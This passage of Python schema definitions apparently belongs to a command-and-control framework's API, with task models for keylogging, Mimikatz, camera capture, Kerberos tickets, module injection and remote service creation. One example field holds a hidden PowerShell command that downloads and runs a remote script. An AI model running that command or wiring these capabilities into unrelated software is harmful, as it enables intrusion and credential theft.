        description="Password for authentication",
        example="Password1",
        title="Password",
    )
    authority: Optional[str] = Field(
        "",
        description="Authentication authority",
        example="Kerberos:ACME\\HostA",
        title="Authority",
    )
    filter: str = Field(
        ...,
        description="WQL filter string",
        example="Select * from Win32_OperatingSystem",
        title="Filter",
    )


class WmiQueryResults(Schema):
    error_info: Optional[TaskErrorInfo] = Field(
        None,
        alias="errorInfo",
        description="Additional error information if the tasking has failed",
        title="Errorinfo",
    )
    results: Optional[List[Dict[str, Any]]] = Field(
        [{}],
        description="Wmi results",
        example=[
            {
                "BootDevice": "\\Device\\HarddiskVolume5",
                "BuildNumber": 17134,
                "BuildType": "Multiprocessor Free",
                "Caption": "Microsoft Windows 10 Pro",
                "CodeSet": 1252,
            }
        ],
        title="Results",
    )


class WmiStaticCallArguments(Schema):
    machine: Optional[str] = Field(
        "localhost",
        description="Remote hostname or IP address (otherwise local)",
        example="ADAM-PC",
        title="Machine",
    )
    namespace: Optional[str] = Field(
        "ROOT\\CIMV2",
        description="Wmi target namespace",
        example="ROOT\\CIMV2",
        title="Namespace",
    )
    username: Optional[str] = Field(
        "",
        description="Username for authentication",
        example="ACME\\Jason",
        title="Username",
    )
    password: Optional[str] = Field(
        "",
        description="Password for authentication",
        example="Password1",
        title="Password",
    )
    authority: Optional[str] = Field(
        "",
        description="Authentication authority",
        example="Kerberos:ACME\\HostA",
        title="Authority",
    )
    class_: str = Field(
        ...,
        alias="class",
        description="Full class name",
        example="Win32_Process",
        title="Class",
    )
    method: str = Field(..., description="Method name", example="Create", title="Method")
    parameters: Dict[str, Any] = Field(
        ...,
        description="Method parameters",
        example={"CommandLine": "C:\\Windows\\System32\\cmd.exe"},
        title="Parameters",
    )


class WmiStaticCallResults(Schema):
    error_info: Optional[TaskErrorInfo] = Field(
        None,
        alias="errorInfo",
        description="Additional error information if the tasking has failed",
        title="Errorinfo",
    )
    results: Optional[Dict[str, Any]] = Field(
        {},
        description="Wmi results",
        example={
            "BootDevice": "\\Device\\HarddiskVolume5",
            "BuildNumber": 17134,
            "BuildType": "Multiprocessor Free",
            "Caption": "Microsoft Windows 10 Pro",
            "CodeSet": 1252,
        },
        title="Results",
    )


class BlobReferenceOrData(Schema):
    id: Optional[str] = Field(None, description="Blob identifier", title="Id")
    name: Optional[str] = Field(None, description="Contextual name", title="Name")
    data: Optional[bytes] = Field(None, description="Raw data", title="Data")
    hint: Optional[ContentHint] = Field(None, description="Content data type hint")
    size: Optional[int] = Field(0, description="Data size", title="Size")


class CameraCaptureResults(Schema):
    error_info: Optional[TaskErrorInfo] = Field(
        None,
        alias="errorInfo",
        description="Additional error information if the tasking has failed",
        title="Errorinfo",
    )
    data: Optional[BlobReferenceOrData] = Field(
        {"id": "null", "size": 0},
        description="JPEG data from camera",
        example="EXAMPLE_JPEG",
        title="Data",
    )


class CameraListResults(Schema):
    error_info: Optional[TaskErrorInfo] = Field(
        None,
        alias="errorInfo",
        description="Additional error information if the tasking has failed",
        title="Errorinfo",
    )
    cameras: Optional[List[Camera]] = Field(
        [],
        description="List of available cameras",
        example=[{"id": 1, "name": "Logitech C120"}],
        title="Cameras",
    )


class ContextIdleResults(Schema):
    error_info: Optional[TaskErrorInfo] = Field(
        None,
        alias="errorInfo",
        description="Additional error information if the tasking has failed",
        title="Errorinfo",
    )
    minutes: Optional[int] = Field(
        0,
        description="Minutes the current user session has been idle",
        example=15,
        title="Minutes",
    )


class ContextProcessResults(Schema):
    error_info: Optional[TaskErrorInfo] = Field(
        None,
        alias="errorInfo",
        description="Additional error information if the tasking has failed",
        title="Errorinfo",
    )
    process_id: Optional[int] = Field(
        0,
        alias="processId",
        description="Current process id",
        example=1234,
        title="Processid",
    )
    architecture: Optional[Architecture] = Field("x64", description="Current process architecture", example="x64")
    path: Optional[str] = Field(
        "",
        description="Process binary path",
        example="C:\\Software\\Slingshot.exe",
        title="Path",
    )
    user_id: Optional[str] = Field(
        "",
        alias="userId",
        description="Token domain and username",
        example="ACME\\Jason",
        title="Userid",
    )


class ContextUserResults(Schema):
    error_info: Optional[TaskErrorInfo] = Field(
        None,
        alias="errorInfo",
        description="Additional error information if the tasking has failed",
        title="Errorinfo",
    )
    domain: Optional[str] = Field("", description="Token domain name", example="ACME", title="Domain")
    username: Optional[str] = Field("", description="Token user name", example="Jason", title="Username")
    netonly: Optional[bool] = Field(False, description="NETWORK_ONLY logon type", example=False, title="Netonly")
    sid: Optional[str] = Field(
        None,
        description="Security identifier",
        example="S-1-5-21-559599230-1559177840-3308743733-1004",
        title="Sid",
    )
    integrity: Optional[TokenIntegrity] = Field(None, description="Token integrity", example="medium")


class ExitResults(Schema):
    error_info: Optional[TaskErrorInfo] = Field(
        None,
        alias="errorInfo",
        description="Additional error information if the tasking has failed",
        title="Errorinfo",
    )


class FileChangeDirectoryResults(Schema):
    error_info: Optional[TaskErrorInfo] = Field(
        None,
        alias="errorInfo",
        description="Additional error information if the tasking has failed",
        title="Errorinfo",
    )
    directory: Optional[str] = Field("", description="Current directory", example="C:\\Users", title="Directory")


class FileCopyResults(Schema):
    error_info: Optional[TaskErrorInfo] = Field(
        None,
        alias="errorInfo",
        description="Additional error information if the tasking has failed",
        title="Errorinfo",
    )


class FileDownloadResults(Schema):
    error_info: Optional[TaskErrorInfo] = Field(
        None,
        alias="errorInfo",
        description="Additional error information if the tasking has failed",
        title="Errorinfo",
    )
    data: Optional[BlobReferenceOrData] = Field(
        {"id": "null", "size": 0},
        description="File data from remote filesystem",
        example="EXAMPLE_DATA",
        title="Data",
    )


class FileListArguments(Schema):
    directory: Optional[str] = Field(
        ".\\",
        description="Directory path (supports environment variables)",
        example="C:\\Windows",
        title="Directory",
    )
    time_format: Optional[TimeFormat] = Field(
        "access",
        alias="timeFormat",
        description="Time detail to request",
        example="access",
    )


class FileListResults(Schema):
    error_info: Optional[TaskErrorInfo] = Field(
        None,
        alias="errorInfo",
        description="Additional error information if the tasking has failed",
        title="Errorinfo",
    )
    entries: Optional[List[FileOrDirectory]] = Field(
        [],
        description="Directory entires",
        example=[
            {"name": "Windows", "isDir": True, "time": "2000-01-02T03:04:05"},
            {"name": "System32", "isDir": True, "time": "2000-01-02T03:04:05"},
            {
                "name": "root.dat",
                "isDir": False,
                "time": "2000-01-02T03:04:05",
                "size": 7344321,
            },
            {
                "name": "page.sys",
                "isDir": False,
                "time": "2000-01-02T03:04:05",
                "size": 5134,
            },
        ],
        title="Entries",
    )


class FileMakeDirectoryResults(Schema):
    error_info: Optional[TaskErrorInfo] = Field(
        None,
        alias="errorInfo",
        description="Additional error information if the tasking has failed",
        title="Errorinfo",
    )


class FileMoveResults(Schema):
    error_info: Optional[TaskErrorInfo] = Field(
        None,
        alias="errorInfo",
        description="Additional error information if the tasking has failed",
        title="Errorinfo",
    )


class FileRemoveDirectoryResults(Schema):
    error_info: Optional[TaskErrorInfo] = Field(
        None,
        alias="errorInfo",
        description="Additional error information if the tasking has failed",
        title="Errorinfo",
    )


class FileRemoveResults(Schema):
    error_info: Optional[TaskErrorInfo] = Field(
        None,
        alias="errorInfo",
        description="Additional error information if the tasking has failed",
        title="Errorinfo",
    )


class FileUploadResults(Schema):
    error_info: Optional[TaskErrorInfo] = Field(
        None,
        alias="errorInfo",
        description="Additional error information if the tasking has failed",
        title="Errorinfo",
    )


class HttpValidationError(Schema):
    detail: Optional[List[ValidationError]] = Field(None, title="Detail")


class HostFileArguments(Schema):
    encoding: Optional[HostingEncoding] = Field("base64", description="Encoding for binary data", example="base64")
    base_url: Optional[str] = Field(
        "",
        alias="baseUrl",
        description="Base URL (default is from profile)",
        example="http://mycustom.com",
        title="Baseurl",
    )
    endpoint: str = Field(
        ...,
        description="Web endpoint path to host data",
        example="/custom",
        title="Endpoint",
    )
    data: BlobReferenceOrData = Field(..., description="Data or blob to host", title="Data")


class HostFileResults(Schema):
    error_info: Optional[TaskErrorInfo] = Field(
        None,
        alias="errorInfo",
        description="Additional error information if the tasking has failed",
        title="Errorinfo",
    )
    url: Optional[str] = Field(
        "",
        description="Final URL path for hosting",
        example="http://server.com/sub/path",
        title="Url",
    )


class HostPowershellResults(Schema):
    error_info: Optional[TaskErrorInfo] = Field(
        None,
        alias="errorInfo",
        description="Additional error information if the tasking has failed",
        title="Errorinfo",
    )
    command: Optional[str] = Field(
        "",
        description="Command line for execution",
        example="powershell.exe -w hidden -c \"IEX ((new-object net.webclient).downloadstring('http://server.com/sub/path'))\"",
        title="Command",
    )


class HostShellcodeResults(Schema):
    error_info: Optional[TaskErrorInfo] = Field(
        None,
        alias="errorInfo",
        description="Additional error information if the tasking has failed",
        title="Errorinfo",
    )
    url: Optional[str] = Field(
        "",
        description="Final URL path for hosting",
        example="http://server.com/sub/path",
        title="Url",
    )


class HostUnloadResults(Schema):
    error_info: Optional[TaskErrorInfo] = Field(
        None,
        alias="errorInfo",
        description="Additional error information if the tasking has failed",
        title="Errorinfo",
    )


class InfoResults(Schema):
    error_info: Optional[TaskErrorInfo] = Field(
        None,
        alias="errorInfo",
        description="Additional error information if the tasking has failed",
        title="Errorinfo",
    )
    machine_name: Optional[str] = Field(
        "",
        alias="machineName",
        description="Machine hostname",
        example="EXAMPLE-PC",
        title="Machinename",
    )
    architecture: Optional[str] = Field(
        "",
        description="Current process architecture",
        example="x64",
        title="Architecture",
    )
    os_version: Optional[str] = Field(
        "",
        alias="osVersion",
        description="Operating system version",
        example="10.0.19041 [10 20H1]",
        title="Osversion",
    )
    user_id: Optional[str] = Field(
        "",
        alias="userId",
        description="Token domain and username",
        example="ACME\\John",
        title="Userid",
    )


class InjectResults(Schema):
    error_info: Optional[TaskErrorInfo] = Field(
        None,
        alias="errorInfo",
        description="Additional error information if the tasking has failed",
        title="Errorinfo",
    )


class InstanceInResponse(Schema):
    id: UUID = Field(..., title="Id")
    tool: Tool
    tag: str = Field(..., max_length=50, title="Tag")
    name: str = Field(..., max_length=100, title="Name")
    hidden: bool = Field(..., title="Hidden")
    updated_at: datetime = Field(..., alias="updatedAt", title="Updatedat")
    created_at: datetime = Field(..., alias="createdAt", title="Createdat")
    machine_name: str = Field(..., alias="machineName", max_length=256, title="Machinename")
    architecture: str = Field(..., max_length=100, title="Architecture")
    os_name: str = Field(..., alias="osName", max_length=100, title="Osname")
    os_version: str = Field(..., alias="osVersion", max_length=100, title="Osversion")
    context: str = Field(..., max_length=256, title="Context")
    user_name: str = Field(..., alias="userName", max_length=256, title="Username")
    last_transaction: Optional[TransactionInResponse] = Field(None, alias="lastTransaction")
    routes: Optional[List[RouteInResponse]] = Field([], title="Routes")


class KerberosLoadArguments(Schema):
    ticket: BlobReferenceOrData = Field(
        ...,
        description="Kerberos ticket data",
        example="EXAMPLE_TICKET_DATA",
        title="Ticket",
    )


class KerberosLoadResults(Schema):
    error_info: Optional[TaskErrorInfo] = Field(
        None,
        alias="errorInfo",
        description="Additional error information if the tasking has failed",
        title="Errorinfo",
    )


class KerberosPurgeResults(Schema):
    error_info: Optional[TaskErrorInfo] = Field(
        None,
        alias="errorInfo",
        description="Additional error information if the tasking has failed",
        title="Errorinfo",
    )


class KeylogGatherResults(Schema):
    error_info: Optional[TaskErrorInfo] = Field(
        None,
        alias="errorInfo",
        description="Additional error information if the tasking has failed",
        title="Errorinfo",
    )
    keylog: Optional[BlobReferenceOrData] = Field(
        {"id": "null", "size": 0},
        description="Raw captured keystroke data",
        example="EXAMPLE_KEYLOG_DATA",
        title="Keylog",
    )


class LinkResults(Schema):
    error_info: Optional[TaskErrorInfo] = Field(
        None,
        alias="errorInfo",
        description="Additional error information if the tasking has failed",
        title="Errorinfo",
    )
    discovered: Optional[List[DiscoveredInstance]] = Field(
        [],
        description="Discovered instance from the link attempt",
        example=[{"path": "mypipe1", "tag": "jPc4dpYI"}],
        title="Discovered",
    )


class ManagedModuleExecuteResults(Schema):
    error_info: Optional[TaskErrorInfo] = Field(
        None,
        alias="errorInfo",
        description="Additional error information if the tasking has failed",
        title="Errorinfo",
    )
    output: Optional[str] = Field(
        "",
        description="Output from native module",
        example="Custom output string",
        title="Output",
    )


class ManagedModuleLoadArguments(Schema):
    version: Optional[DotNetFrameworkVersion] = Field(
        "unknown",
        description="Framework version for hosting (otherwise assumed from instance version)",
        example="4",
    )
    module: BlobReferenceOrData = Field(
        ...,
        description="Managed assembly to load (.NET DLL)",
        example="MZ_EXAMPLE_MODULE",
        title="Module",
    )


class ManagedModuleLoadResults(Schema):
    error_info: Optional[TaskErrorInfo] = Field(
        None,
        alias="errorInfo",
        description="Additional error information if the tasking has failed",
        title="Errorinfo",
    )


class ManagedModuleUnloadResults(Schema):
    error_info: Optional[TaskErrorInfo] = Field(
        None,
        alias="errorInfo",
        description="Additional error information if the tasking has failed",
        title="Errorinfo",
    )


class MimikatzExecuteResults(Schema):
    error_info: Optional[TaskErrorInfo] = Field(
        None,
        alias="errorInfo",
        description="Additional error information if the tasking has failed",
        title="Errorinfo",
    )
    output: Optional[str] = Field(
        "",
        description="Output from Mimikatz module",
        example="mimikatz 2.1.1 (arch x64)\nWindows NT 10.0 build 2657 (arch x64)\nmsvc 190024215 1",
        title="Output",
    )


class MimikatzLoadResults(Schema):
    error_info: Optional[TaskErrorInfo] = Field(
        None,
        alias="errorInfo",
        description="Additional error information if the tasking has failed",
        title="Errorinfo",
    )


class MinidumpResults(Schema):
    error_info: Optional[TaskErrorInfo] = Field(
        None,
        alias="errorInfo",
        description="Additional error information if the tasking has failed",
        title="Errorinfo",
    )


class NamedPipeSendArguments(Schema):
    host: str = Field(..., description="Hostname or IP address", example="ADAM-PC", title="Host")
    pipe: str = Field(..., description="Named pipe for delivery", example="SvcPipe", title="Pipe")
    data: BlobReferenceOrData = Field(..., description="Data to send", example="EXAMPLE_PIPE_DATA", title="Data")
    timeout: Optional[int] = Field(0, description="Named pipe timeout in seconds", title="Timeout")
    compress: Optional[bool] = Field(False, description="Compress data with zlib before sending", title="Compress")
    wait: Optional[bool] = Field(False, description="Wait for pipe response data", title="Wait")
    encryption_key: Optional[bytes] = Field(
        "",
        alias="encryptionKey",
        description="Symetric key to encrypt with, ommit for no encryption",
        title="Encryptionkey",
    )


class NamedPipeSendResults(Schema):
    error_info: Optional[TaskErrorInfo] = Field(
        None,
        alias="errorInfo",
        description="Additional error information if the tasking has failed",
        title="Errorinfo",
    )
    response: Optional[BlobReferenceOrData] = Field(
        None,
        description="Response from the remote pipe if requested",
        example="EXAMPLE_PIPE_RESPONSE",
        title="Response",
    )


class NativeModuleExecuteResults(Schema):
    error_info: Optional[TaskErrorInfo] = Field(
        None,
        alias="errorInfo",
        description="Additional error information if the tasking has failed",
        title="Errorinfo",
    )
    output: Optional[str] = Field(
        "",
        description="Output from native module",
        example="Custom output string!",
        title="Output",
    )


class NativeModuleLoadArguments(Schema):
    module: BlobReferenceOrData = Field(
        ...,
        description="Native PE module to load (DLL)",
        example="MZ_EXAMPLE_MODULE",
        title="Module",
    )
    obfuscate: Optional[bool] = Field(
        False,
        description="Obfuscate module in memory between uses",
        example=False,
        title="Obfuscate",
    )


class NativeModuleLoadResults(Schema):
    error_info: Optional[TaskErrorInfo] = Field(
        None,
        alias="errorInfo",
        description="Additional error information if the tasking has failed",
        title="Errorinfo",
    )


class NativeModuleUnloadResults(Schema):
    error_info: Optional[TaskErrorInfo] = Field(
        None,
        alias="errorInfo",
        description="Additional error information if the tasking has failed",
        title="Errorinfo",
    )


class NetworkConnectResults(Schema):
    error_info: Optional[TaskErrorInfo] = Field(
        None,
        alias="errorInfo",
        description="Additional error information if the tasking has failed",
        title="Errorinfo",
    )
    hosts: Optional[List[str]] = Field(
        [],
        description="List of hosts in which connections succeeded",
        example=["192.168.1.5", "192.168.1.6"],
        title="Hosts",
    )


class NetworkEnumerateSessionResults(Schema):
    error_info: Optional[TaskErrorInfo] = Field(
        None,
        alias="errorInfo",
        description="Additional error information if the tasking has failed",
        title="Errorinfo",
    )
    sessions: Optional[List[SessionDetails]] = Field(
        [],
        description="List of session details",
        example=[{"username": "Jason", "source": "SOURCE-PC", "active": 30, "idle": 15}],
        title="Sessions",
    )


class NetworkPingResults(Schema):
    error_info: Optional[TaskErrorInfo] = Field(
        None,
        alias="errorInfo",
        description="Additional error information if the tasking has failed",
        title="Errorinfo",
    )


class NetworkResolveResults(Schema):
    error_info: Optional[TaskErrorInfo] = Field(
        None,
        alias="errorInfo",
        description="Additional error information if the tasking has failed",
        title="Errorinfo",
    )
    dns_name: Optional[str] = Field(
        None,
        alias="dnsName",
        description="Address provided via DNS resolution",
        example="1.2.3.4",
        title="Dnsname",
    )
    nbns_name: Optional[str] = Field(
        None,
        alias="nbnsName",
        description="Address provided via NetBIOS resolution",
        example="1.2.3.4",
        title="Nbnsname",
    )


class PayloadSeed(Schema):
    tool: Tool = Field(..., description="Tool identifier")
    name: str = Field(..., description="Payload name", title="Name")
    profile: Optional[UUID] = Field(
        None,
        description="C2 profile to use (otherwise derive from current instance)",
        title="Profile",
    )


class PayloadWithData(Schema):
    tool: Tool = Field(..., description="Tool identifier")
    name: str = Field(..., description="Payload name", title="Name")
    version: str = Field(..., description="Tool version", title="Version")
    cached: datetime = Field(..., description="Payload cache time", title="Cached")
    ext: str = Field(..., description="Original payload extension", title="Ext")
    data: bytes = Field(..., description="Raw payload bytes", title="Data")


class PayloadWithMetadata(Schema):
    tool: Tool = Field(..., description="Tool identifier")
    name: str = Field(..., description="Payload name", title="Name")
    version: str = Field(..., description="Tool version", title="Version")
    cached: datetime = Field(..., description="Payload cache time", title="Cached")


class PowershellBaseResults(Schema):
    error_info: Optional[TaskErrorInfo] = Field(
        None,
        alias="errorInfo",
        description="Additional error information if the tasking has failed",
        title="Errorinfo",
    )


class PowershellExecuteResults(Schema):
    error_info: Optional[TaskErrorInfo] = Field(
        None,
        alias="errorInfo",
        description="Additional error information if the tasking has failed",
        title="Errorinfo",
    )
    output: Optional[str] = Field(
        "",
        description="Output from Powershell module",
        example="\nName             : ConsoleHost\nVersion          : 5.1.19041.610\nInstanceId       : 0484e4be-534a-4b4d-9ec2-a39109fbb490\n",
        title="Output",
    )


class PowershellLoadResults(Schema):
    error_info: Optional[TaskErrorInfo] = Field(
        None,
        alias="errorInfo",
        description="Additional error information if the tasking has failed",
        title="Errorinfo",
    )


class PowershellStageArguments(Schema):
    script: Optional[BlobReferenceOrData] = Field(
        {"id": "null", "size": 0},
        description="Script data to stage before all additional execution",
        example="EXAMPLE_POSH_CODE",
        title="Script",
    )
    script_url: Optional[str] = Field(
        "",
        alias="scriptUrl",
        description="URL path for hosted script file",
        example="https://github.com/PowerShellMafia/PowerSploit/blob/master/Recon/PowerView.ps1",
        title="Scripturl",
    )


class PowershellStageResults(Schema):
    error_info: Optional[TaskErrorInfo] = Field(
        None,
        alias="errorInfo",
        description="Additional error information if the tasking has failed",
        title="Errorinfo",
    )


class PowershellUnstageResults(Schema):
    error_info: Optional[TaskErrorInfo] = Field(
        None,
        alias="errorInfo",
        description="Additional error information if the tasking has failed",
        title="Errorinfo",
    )


class ProcessExecuteBaseResults(Schema):
    error_info: Optional[TaskErrorInfo] = Field(
        None,
        alias="errorInfo",
        description="Additional error information if the tasking has failed",
        title="Errorinfo",
    )


class ProcessListResults(Schema):
    error_info: Optional[TaskErrorInfo] = Field(
        None,
        alias="errorInfo",
        description="Additional error information if the tasking has failed",
        title="Errorinfo",
    )
    processes: Optional[List[Process]] = Field(
        [],
        description="Complete list of queriable processes",
        example=[
            {"ppid": 0, "pid": 1, "sess": 0, "name": "System"},
            {
                "ppid": 567,
                "pid": 321,
                "sess": 1,
                "arch": "x86",
                "name": "chrome.exe",
                "owner": "ACME\\John",
                "path": "C:\\Google\\chrome.exe",
            },
            {
                "ppid": 567,
                "pid": 432,
                "sess": 1,
                "arch": "x64",
                "name": "cmd.exe",
                "owner": "ACME\\John",
                "path": "C:\\Windows\\System32\\cmd.exe",
            },
        ],
        title="Processes",
    )


class ProcessPowershellResults(Schema):
    error_info: Optional[TaskErrorInfo] = Field(
        None,
        alias="errorInfo",
        description="Additional error information if the tasking has failed",
        title="Errorinfo",
    )
    output: Optional[str] = Field(
        "",
        description="Output from powershell.exe",
        example="Major  Minor  Build  Revision\n-----  -----  -----  --------\n5      1      19041  1",
        title="Output",
    )


class ProcessShellResults(Schema):
    error_info: Optional[TaskErrorInfo] = Field(
        None,
        alias="errorInfo",
        description="Additional error information if the tasking has failed",
        title="Errorinfo",
    )
    output: Optional[str] = Field(
        "",
        description="Output from cmd.exe",
        example="Volume in drive C has no label.\nVolume Serial Number is 9ED1-36D3",
        title="Output",
    )


class ProcessStartResults(Schema):
    error_info: Optional[TaskErrorInfo] = Field(
        None,
        alias="errorInfo",
        description="Additional error information if the tasking has failed",
        title="Errorinfo",
    )


class ProfileInResponse(Schema):
    id: UUID = Field(..., title="Id")
    tool: Tool
    name: str = Field(..., max_length=265, title="Name")
    data: Dict[str, Any] = Field(..., title="Data")
    updated_at: datetime = Field(..., alias="updatedAt", title="Updatedat")


class RttPortalAccessInfo(Schema):
    status: RttPortalAccessStatus
    auth_url: Optional[str] = Field(
        None,
        alias="authUrl",
        description="URL to finish device flow authentication",
        title="Authurl",
    )


class RegistryCreateArguments(Schema):
    path: str = Field(
        ...,
        description="Full registry path",
        example="HKEY_LOCAL_MACHINE\\Software",
        title="Path",
    )
    machine: Optional[str] = Field(
        "",
        description="Remote hostname or IP address (otherwise local)",
        example="ADAM-PC",
        title="Machine",
    )
    value: Optional[str] = Field("", description="Registry sub-value name", example="MyValue", title="Value")
    vtype: Optional[RegistryType] = Field("REG_NONE", description="Value type", example="REG_DWORD")
    data: Optional[str] = Field("", description="Registry value data", example="MyData", title="Data")
    force: Optional[bool] = Field(
        False,
        description="Overwrite existing entry if required",
        example=False,
        title="Force",
    )


class RegistryCreateResults(Schema):
    error_info: Optional[TaskErrorInfo] = Field(
        None,
        alias="errorInfo",
        description="Additional error information if the tasking has failed",
        title="Errorinfo",
    )


class RegistryDeleteResults(Schema):
    error_info: Optional[TaskErrorInfo] = Field(
        None,
        alias="errorInfo",
        description="Additional error information if the tasking has failed",
        title="Errorinfo",
    )


class RegistryQueryResults(Schema):
    error_info: Optional[TaskErrorInfo] = Field(
        None,
        alias="errorInfo",
        description="Additional error information if the tasking has failed",
        title="Errorinfo",
    )
    keys: Optional[List[str]] = Field(
        [],
        description="Sub-keys of the queried root key",
        example=[
            "HKEY_LOCAL_MACHINE\\Software\\Corp\\Cat",
            "HKEY_LOCAL_MACHINE\\Software\\Corp\\Dog",
        ],
        title="Keys",
    )
    values: Optional[List[RegistryValue]] = Field(
        [],
        description="Sub-values of the queried root key",
        example=[
            {"name": "LastAction", "type": "REG_SZ", "data": "Meow"},
            {"name": "MetaData", "type": "REG_BINARY", "data": "bWVvdw=="},
        ],
        title="Values",
    )


class ScheduledTaskCreateExArguments(Schema):
    machine: Optional[str] = Field(
        "",
        description="Remote hostname or IP address (otherwise local)",
        example="ADAM-PC",
        title="Machine",
    )
    username: Optional[str] = Field(
        "",
        description="Username for authentication",
        example="ACME\\Jason",
        title="Username",
    )
    password: Optional[str] = Field(
        "",
        description="Password for authentication",
        example="Password1",
        title="Password",
    )
    folder: Optional[str] = Field(
        "\\",
        description="Parent folder for operation",
        example="\\Microsoft\\",
        title="Folder",
    )
    task: str = Field(..., description="Task name", example="GoogleUpdates", title="Task")
    xml: BlobReferenceOrData = Field(
        ...,
        description="Raw task XML data",
        example="EXAMPLE_SCHTASKS_XML",
        title="Xml",
    )


class ScheduledTaskCreateExResults(Schema):
    error_info: Optional[TaskErrorInfo] = Field(
        None,
        alias="errorInfo",
        description="Additional error information if the tasking has failed",
        title="Errorinfo",
    )


class ScheduledTaskCreateResults(Schema):
    error_info: Optional[TaskErrorInfo] = Field(
        None,
        alias="errorInfo",
        description="Additional error information if the tasking has failed",
        title="Errorinfo",
    )


class ScheduledTaskDeleteResults(Schema):
    error_info: Optional[TaskErrorInfo] = Field(
        None,
        alias="errorInfo",
        description="Additional error information if the tasking has failed",
        title="Errorinfo",
    )


class ScheduledTaskQueryResults(Schema):
    error_info: Optional[TaskErrorInfo] = Field(
        None,
        alias="errorInfo",
        description="Additional error information if the tasking has failed",
        title="Errorinfo",
    )
    folders: Optional[List[str]] = Field(
        [],
        description="Sub-folders from query",
        example=["\\Microsoft", "\\Intel"],
        title="Folders",
    )
    tasks: Optional[List[TaskInfo]] = Field(
        [],
        description="Tasks results from query",
        example=[
            {
                "path": "Adobe Acrobat Update Task",
                "state": "ready",
                "lastRun": "2001-05-04 03:02:01",
                "lastResult": 0,
                "xml": "<xml>Example Task Xml</xml>",
            }
        ],
        title="Tasks",
    )


class ScheduledTaskStartResults(Schema):
    error_info: Optional[TaskErrorInfo] = Field(
        None,
        alias="errorInfo",
        description="Additional error information if the tasking has failed",
        title="Errorinfo",
    )


class ScheduledTaskStopResults(Schema):
    error_info: Optional[TaskErrorInfo] = Field(
        None,
        alias="errorInfo",
        description="Additional error information if the tasking has failed",
        title="Errorinfo",
    )


class ScreenshotResults(Schema):
    error_info: Optional[TaskErrorInfo] = Field(
        None,
        alias="errorInfo",
        description="Additional error information if the tasking has failed",
        title="Errorinfo",
    )
    data: Optional[BlobReferenceOrData] = Field(
        {"id": "null", "size": 0},
        description="JPEG data from screen",
        example="EXAMPLE_JPEG",
        title="Data",
    )


class ScriptInfo(Schema):
    name: str = Field(..., description="Script name", title="Name")
    type: ScriptType = Field(..., description="Script type")
    cached: datetime = Field(..., description="Script cache time", title="Cached")


class ScriptOutput(Schema):
    type: StdioType = Field(..., description="Stdio type", example="out")
    message: str = Field(..., description="Message text", example="[+] Done.", title="Message")


class ServerScriptInfo(Schema):
    name: str = Field(..., description="Script name", title="Name")
    status: ServerScriptStatus = Field(..., description="Server script status")
    env: Optional[Dict[str, str]] = Field({}, description="Saved ENV variables", title="Env")
    output: Optional[List[ScriptOutput]] = Field(
        [],
        description="Script output entries",
        example=[{"type": "out", "message": "[+] Done."}],
        title="Output",
    )


class ServiceConfigInCreate(Schema):
    display_name: str = Field(..., alias="displayName", example="My Service", title="Displayname")
    binary_path: str = Field(..., alias="binaryPath", example="C:\\Windows\\service.exe", title="Binarypath")
    start_name: Optional[str] = Field(
        "NT AUTHORITY\\SYSTEM",
        alias="startName",
        example="NT AUTHORITY\\SYSTEM",
        title="Startname",
    )
    service_type: Optional[ServiceType] = Field("win32_own_process", alias="serviceType", example="win32_own_process")
    start_type: Optional[ServiceStartType] = Field("demand_start", alias="startType", example="demand_start")
    error_control: Optional[ServiceErrorControl] = Field("error_ignore", alias="errorControl", example="error_ignore")
    name: str = Field(..., example="mysvc", title="Name")


class ServiceConfigInResponse(Schema):
    display_name: str = Field(..., alias="displayName", example="My Service", title="Displayname")
    binary_path: str = Field(..., alias="binaryPath", example="C:\\Windows\\service.exe", title="Binarypath")
    start_name: Optional[str] = Field(
        "NT AUTHORITY\\SYSTEM",
        alias="startName",
        example="NT AUTHORITY\\SYSTEM",
        title="Startname",
    )
    service_type: Optional[ServiceType] = Field("win32_own_process", alias="serviceType", example="win32_own_process")
    start_type: Optional[ServiceStartType] = Field("demand_start", alias="startType", example="demand_start")
    error_control: Optional[ServiceErrorControl] = Field("error_ignore", alias="errorControl", example="error_ignore")
    description: str = Field(..., example="Do secret things", title="Description")
    load_order_group: str = Field(..., alias="loadOrderGroup", example="", title="Loadordergroup")
    dependencies: List[str] = Field(..., example=["spoolsv"], title="Dependencies")
    required_privileges: List[SePrivilege] = Field(..., alias="requiredPrivileges", example=["SeDebugPrivilege"])
    process_id: Optional[int] = Field(0, alias="processId", example=1234, title="Processid")
    exit_code: Optional[int] = Field(0, alias="exitCode", example=0, title="Exitcode")
    current_state: Optional[ServiceState] = Field("stopped", alias="currentState", example="running")


class ServiceCreateExArguments(Schema):
    machine: Optional[str] = Field(
        "",
        description="Remote hostname or IP address (otherwise local)",
        example="ADAM-PC",
        title="Machine",
    )
    config: ServiceConfigInCreate = Field(
        ...,
        description="Service configuration",
        example={
            "displayName": "My Service",
            "binaryPath": "C:\\Windows\\service.exe",
            "startName": "NT AUTHORITY\\SYSTEM",
            "serviceType": "win32_own_process",
            "startType": "demand_start",
            "errorControl": "error_ignore",
            "name": "mysvc",
        },
        title="Config",
    )


class ServiceCreateExResults(Schema):
    error_info: Optional[TaskErrorInfo] = Field(
        None,
        alias="errorInfo",
        description="Additional error information if the tasking has failed",
        title="Errorinfo",
    )


class ServiceCreateResults(Schema):
    error_info: Optional[TaskErrorInfo] = Field(
        None,
        alias="errorInfo",
        description="Additional error information if the tasking has failed",
        title="Errorinfo",
    )


class ServiceDeleteResults(Schema):
    error_info: Optional[TaskErrorInfo] = Field(
        None,
        alias="errorInfo",
        description="Additional error information if the tasking has failed",
        title="Errorinfo",
    )


class ServiceModifyArguments(Schema):
    machine: Optional[str] = Field(
        "",
        description="Remote hostname or IP address (otherwise local)",
        example="ADAM-PC",
        title="Machine",
    )
    service: str = Field(..., description="Service name", example="spoolsv", title="Service")
    config: Optional[ServiceConfigInResponse] = Field(
        None,
        description="Service configuration",
        example={
            "displayName": "My Service",
            "binaryPath": "C:\\Windows\\service.exe",
            "startName": "NT AUTHORITY\\SYSTEM",
            "serviceType": "win32_own_process",
            "startType": "demand_start",
            "errorControl": "error_ignore",
            "description": "Do secret things",
            "loadOrderGroup": "",
            "dependencies": [],
            "requiredPrivileges": ["SeDebugPrivilege"],
            "processId": 0,
            "exitCode": 0,
            "currentState": "stopped",
        },
        title="Config",
    )


class ServiceModifyResults(Schema):
    error_info: Optional[TaskErrorInfo] = Field(
        None,
        alias="errorInfo",
        description="Additional error information if the tasking has failed",
        title="Errorinfo",
    )


class ServiceQueryResults(Schema):
    error_info: Optional[TaskErrorInfo] = Field(
        None,
